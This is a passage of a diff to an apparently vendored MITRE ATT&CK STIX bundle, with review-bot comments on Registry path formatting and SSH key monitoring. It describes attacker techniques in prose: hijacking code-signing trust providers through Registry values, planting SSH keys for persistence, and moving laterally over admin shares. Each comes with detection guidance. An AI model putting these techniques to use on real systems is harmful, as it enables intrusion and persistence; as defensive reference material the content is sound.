This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
"id": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc",
"type": "attack-pattern",
"kill_chain_phases": [
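Review bot: The first bullet of the rewritten description still gives the Registry path as `HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\...`, with no separator between `SOFTWARE` and the optional `[WOW6432Node\\]` element, whereas the second and third bullets write `HKLM\\SOFTWARE\\[WOW6432Node\\]...`; the first should match them so a defender copying the path into an audit SACL does not end up with `SOFTWARE[` literally. The wording change itself (whitelisting to application control) is fine. The string is also shown broken across physical lines here ("...execute on a system. " then "Adversaries may hijack..."); if that is a raw line break in the file rather than a rendering artifact it is invalid JSON, so it is worth confirming with a strict parser such as `python -m json.tool`. As this bundle appears to be a vendored upstream export, both points are upstream fixes rather than local edits.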
@@ -22761,14 +23588,21 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T13:19:38.506Z",
+ "modified": "2020-06-20T22:42:26.022Z",
"created": "2020-02-05T19:34:04.910Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "Administrator"
],
- "x_mitre_contributors": [
- "Matt Graeber, @mattifestation, SpecterOps"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Autoruns Analysis",
+ "Digital Certificate Validation",
+ "User Mode Signature Validation"
],
+ "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. 
Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \u201cHide Microsoft Entries\u201d and \u201cHide Windows Entries\u201d are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)",
"x_mitre_data_sources": [
"Windows Registry",
"API monitoring",
@@ -22779,22 +23613,30 @@
"Windows Registry",
"Windows event logs"
],
- "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. 
Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \u201cHide Microsoft Entries\u201d and \u201cHide Windows Entries\u201d are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)",
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Autoruns Analysis",
- "Digital Certificate Validation",
- "Process whitelisting",
- "User Mode Signature Validation"
+ "x_mitre_contributors": [
+ "Matt Graeber, @mattifestation, SpecterOps"
],
- "x_mitre_permissions_required": [
- "SYSTEM",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2020-02-11T18:25:28.212Z",
+ "modified": "2020-03-23T21:16:02.812Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
+ "name": "SMB/Windows Admin Shares",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -22837,22 +23679,6 @@
"source_name": "Medium Detecting WMI Persistence"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "SMB/Windows Admin Shares",
- "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
- "id": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-03-23T21:16:02.812Z",
- "created": "2020-02-11T18:25:28.212Z",
"x_mitre_platforms": [
"Windows"
],
@@ -22922,25 +23748,25 @@
],
"modified": "2020-03-25T23:30:20.638Z",
"created": "2019-12-12T14:59:58.168Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
+ "x_mitre_data_sources": [
+ "Application logs"
],
- "x_mitre_contributors": [
- "Carlos Borges, @huntingneo, CIP",
- "Lucas da Silva Pereira, @vulcanunsec, CIP",
- "Kaspersky"
- ],
- "x_mitre_detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM",
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Application logs"
+ "x_mitre_detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.",
+ "x_mitre_contributors": [
+ "Carlos Borges, @huntingneo, CIP",
+ "Lucas da Silva Pereira, @vulcanunsec, CIP",
+ "Kaspersky"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
]
},
{
@@ -22977,21 +23803,80 @@
],
"modified": "2020-03-23T23:43:46.977Z",
"created": "2020-02-11T18:27:15.774Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_system_requirements": [
+ "An SSH server is configured and running."
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of SSH may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
"x_mitre_data_sources": [
"Authentication logs",
"Process use of network",
"Network protocol analysis",
"Netflow/Enclave netflow"
],
- "x_mitre_system_requirements": [
- "An SSH server is configured and running."
+ "x_mitre_detection": "Use of SSH may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1098.004",
+ "url": "https://attack.mitre.org/techniques/T1098/004"
+ },
+ {
+ "source_name": "SSH Authorized Keys",
+ "url": "https://www.ssh.com/ssh/authorized_keys/",
+ "description": "ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Venafi SSH Key Abuse",
+ "url": "https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities",
+ "description": "Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020."
+ },
+ {
+ "source_name": "Cybereason Linux Exim Worm",
+ "url": "https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability",
+ "description": "Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "SSH Authorized Keys",
+ "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system\u2019s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value \u201cyes\u201d to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)",
+ "id": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "modified": "2020-06-25T16:32:23.367Z",
+ "created": "2020-06-24T12:42:35.144Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
]
},
{
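Review bot: The new T1098.004 object's `x_mitre_detection` scopes monitoring to each user's `authorized_keys` file and `/etc/ssh/sshd_config`, but the `AuthorizedKeysFile` directive in sshd_config can point key lookup at any path (and `AuthorizedKeysCommand` can replace the file entirely), so file-integrity monitoring pinned to `<user-home>/.ssh/authorized_keys` misses keys planted through a relocated file; a sentence such as "Monitoring should cover whatever path `AuthorizedKeysFile` resolves to, not only the default location" would close that gap. The same field has a typo, `modifiying`. The description's `PubkeyAuthentication`/`RSAAuthentication` sentence describes a configuration that must already be in place rather than an adversary action, which the detection text could tie back to by treating changes to those directives as signal. Since this bundle looks like a vendored copy of the upstream ATT&CK STIX export, these belong upstream rather than as local edits.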
@@ -23073,24 +23958,24 @@
],
"modified": "2020-03-23T23:11:24.682Z",
"created": "2020-02-25T18:34:38.290Z",
- "x_mitre_contributors": [
- "Anastasios Pingios"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ],
+ "x_mitre_permissions_required": [
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.",
+ "x_mitre_system_requirements": [
+ "SSH service enabled, trust relationships configured, established connections"
],
"x_mitre_data_sources": [
"Authentication logs"
],
- "x_mitre_system_requirements": [
- "SSH service enabled, trust relationships configured, established connections"
- ],
- "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "root"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_contributors": [
+ "Anastasios Pingios"
]
},
{
@@ -23150,22 +24035,22 @@
],
"modified": "2020-03-24T13:45:03.730Z",
"created": "2019-11-27T14:58:00.429Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Process monitoring",
"Windows event logs"
],
- "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -23209,37 +24094,37 @@
],
"modified": "2020-03-24T13:45:04.006Z",
"created": "2017-05-31T21:30:46.977Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_effective_permissions": [
- "SYSTEM",
- "Administrator",
- "User"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM",
- "User"
- ],
- "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process command-line parameters",
- "Windows event logs"
- ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
"x_mitre_contributors": [
"Prashant Verma, Paladion",
"Leo Loobeek, @leoloobeek",
"Travis Smith, Tripwire",
"Alain Homewood, Insomnia Security"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters",
+ "Windows event logs"
+ ],
+ "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_effective_permissions": [
+ "SYSTEM",
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466",
@@ -23265,20 +24150,20 @@
],
"modified": "2020-03-28T00:26:48.769Z",
"created": "2017-05-31T21:30:34.139Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Netflow/Enclave netflow",
- "Process use of network",
- "Process monitoring"
- ],
- "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.",
- "x_mitre_network_requirements": true,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.",
+ "x_mitre_data_sources": [
+ "Netflow/Enclave netflow",
+ "Process use of network",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -23319,19 +24204,19 @@
],
"modified": "2020-03-24T19:56:37.627Z",
"created": "2017-05-31T21:31:25.060Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"File monitoring"
],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
@@ -23396,24 +24281,24 @@
],
"modified": "2020-03-23T12:23:04.955Z",
"created": "2020-01-24T13:51:01.210Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Bartosz Jerzman"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
"x_mitre_data_sources": [
"File monitoring",
"Windows Registry",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Bartosz Jerzman"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"revoked": false,
@@ -23469,28 +24354,28 @@
],
"modified": "2020-03-30T13:39:24.852Z",
"created": "2017-05-31T21:30:51.733Z",
- "x_mitre_deprecated": true,
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Process monitoring",
- "File monitoring",
- "Process command-line parameters"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nAnalyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)",
"x_mitre_defense_bypassed": [
"Process whitelisting",
"Data Execution Prevention",
"Exploit Prevention"
],
- "x_mitre_detection": "Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nAnalyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "File monitoring",
+ "Process command-line parameters"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_deprecated": true
},
{
"external_references": [
@@ -23521,22 +24406,22 @@
],
"modified": "2020-03-25T15:17:30.640Z",
"created": "2020-02-11T18:42:07.281Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
